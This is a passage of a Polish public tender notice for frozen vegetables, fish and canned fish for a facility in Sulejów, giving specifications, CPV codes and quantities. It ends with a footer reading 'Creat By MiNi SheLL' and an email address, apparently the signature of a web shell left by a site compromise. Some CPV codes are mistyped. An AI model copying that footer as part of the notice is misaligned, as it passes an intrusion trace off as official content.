5  Marchew typu junior mrożona klasa I 1533170-9 PN-A-78600:1992;	marchew kl. I, średnica korzenia 10-15 mm, długość od 5 do 7 cm, bez uszkodzeń mechanicznych, bez obcego smaku i zapachu, bez skaz, jednolita odmiana w partii, wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.  kg 100
6	Marchew plastry mrożona klasa I	15331170-9 PN-A-78600:1992;	marchew kl. I, poprzecznie krojona w karbowane plastry, średnica 20-30 mm, bez obcego smaku i zapachu, bez skaz, jednolita odmiana w partii, wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	100
7 Marchew kostka mrożon  klasa I	15331170-9	Kostka marchwi 12-15 mm, bez uszkodzeń, bez obcego smaku i zapachu, bez skaz, wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	 kg	250
8 Groszek zielony mrożony klasa I	1533170-9	Groszek cały, bez uszkodzeń, bez obcego smaku i zapachu, bez skaz, wolny od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna ok 0,45 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.
kg	80
9 Mieszanka warzywna 7-składnikowa mrożona klasa I	1533170-9	Skład: kalafior, fasolka szparagowa, marchew, pietruszka, groszek, por, seler; warzywa nieuszkodzone, bez obcego smaku i zapachu, mieszanka wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.  kg	130
10	Mieszanka chińska 15331170-9 Skład: marchew, papryka, kiełki fasoli Mung, grzyby chińskie Mun, kalafior, pędy bambusa, cebula, por; warzywa nieuszkodzone, bez obcego smaku i zapachu, mieszanka warzywna wolna od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	kg	200
11 Frytki karbowane	153311 70-9	Ziemniaki rozdrobnione, pokrojone w kształt słupków, przeznaczone do pieczenia w piecu, bez obcych smaków i zapachów, bez skaz, zanieczyszczeń, uszkodzeń mechanicznych, frytki wolne od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna od 0,45 kg do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 100
12	Podgrzybek mrożony klasa I	15331135-2 Kapelusze podgrzybka krojone w kostkę, bez obcych smaków i zapachów, bez skaz, zanieczyszczeń, uszkodzeń mechanicznych, wolne od zlepieńców. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	kg	100
13Mieszanka kompotowa	15896000-5	Skład: różne owoce, nie mniej niż cztery asortymenty, klasa I. Opakowanie jednostkowe: torebka foliowa termozgrzewalna ok. 2,50 kg. Opakowanie zbiorcze: pudełko kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.11.35-2, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy  ryb i konserw rybnych dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miruna mrożona 15220000-6 PN-A-86755:1991;	filety całe ze skórą, shatterpack (nie dopuszcza się JQF), bez obcych zanieczyszczeń, glazura techniczna maksymalnie do 5%, barwa mięsa charakterystyczna dla danego gatunku. Opakowania: pudła kartonowe od 7 kg do 24 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.  kg	400
2. Paluszki rybne klasa I	 15220000-6 PN-A-86755:1991;	filety z ryb białych w panierce w kształcie podłużnej kostki o wymiarach ok. 20x30x70 mm, bez obcych zanieczyszczeń. Opakowania: pudła kartonowe od 5 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	kg	80
3. Makrela wędzona tusza b/głowy klasa I	15234000-7 PN-A-86772:1985;	makrela wędzona na gorąco, tusze o wadze 250-300 g ułożone w kartonie równolegle; cechy dyskwalifikujące: zapleśnienia na powierzchni, uszkodzenia mechaniczne, zanieczyszczenia lub uszkodzenia przez szkodniki, smak i zapach jełki, gorzki, pleśni, gnilny, tekstura tkanki mięsnej mazista. Opakowanie: pudło kartonowe od 4 do 10 kg. Termin przydatności do spożycia nie krótszy niż 7 dni od daty dostawy.	kg	50
4. Śledzie solone matias klasa I	15230000-9 PN-A-86766:1984;	filety całe bez obcych zanieczyszczeń, produkt o wysokich walorach smakowych, soczysty, o delikatnej teksturze i łagodnym smaku, barwa tkanki mięsnej jasna, biała do lekko kremowej; cechy dyskwalifikujące: filety rozpadające się, filety o luźnej konsystencji, przebarwienia świadczące o nieświeżości filetów. Opakowanie: wiaderko plastikowe od 4 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy. 	kg	100
5. Śledzie po kaszubsku	15243000-3 PN-A-86780:1998;	zawartość filetów w produkcie min 50%, przypraw 10% w zalewie aromatyczno-korzennej (pomidorowej), o konsystencji zawiesistej, filety całe, bez obcych zanieczyszczeń, produkt o wysokich walorach smakowych, soczysty o delikatnej teksturze i łagodnym smaku, barwa tkanki mięsnej jasna, biała do lekko kremowej; cechy dyskwalifikujące: filety rozpadające się, przebarwienia świadczące o nieświeżości filetów, niedopuszczalny zapach zjełczały, gnilny, chemiczny, stęchły lub inny obcy, niedopuszczalna mazista lub twarda tekstura mięsna. Opakowanie: wiaderko plastikowe od 3 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	kg	100
6. Filet z makreli w pomidorach	15240000-2 PN-A-86763:1991;	konserwa rybna sterylizowana: filety z makreli (nie mniej niż 50%), sos pomidorowy (woda, koncentrat pomidorowy, cukier, maka pszenna, olej roślinny, ziemniak, przyprawy, mąka ziemniaczana, substancja wzmacniająca smak i zapach - glutaminian sodu, ocet, marchew, seler, cebula, sól, kwas octowy. Opakowanie jednostkowe: puszka łatwo otwieralna, waga ok. 175 g. Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	kg 80
7. Szprot w oleju	15240000-2 PN-A-86763:1991;	konserwa rybna; skład: szprot nie mniej niż 60 %, olej roślinny, woda, sól, przyprawy. Opakowanie jednostkowe: puszka łatwo otwieralna,  waga od 170 g do 175 g. Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	kg 80
8. Tuńczyk w oleju 15241400-3 PN-A-86763:1991;	konserwa rybna; skład: duże kawałki tuńczyka, olej słonecznikowy, woda, sól. Opakowanie jednostkowe:puszka otwierana za pomocą otwieracza, waga ok. 185 g. Termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy.	kg	60
9. Ryba z pieca	15242000-6 PN-A-86755:1991,	Filet z mintaja minimum 50%, brokuły minimum 15%, woda, mąka pszenna, śmietana, oleje roślinne, ser, cebula, masło, sól, aromat, drożdże, skrobia ziemniaczana, kwasy, sole eliminujące barwnik, betakaroten, czosnek, laktoza, Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.40.00-7, 15.23.00.00-9, 15.24.30.00-3, 15.24.00.00-2, 15.24.14.00-3, 15.24.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com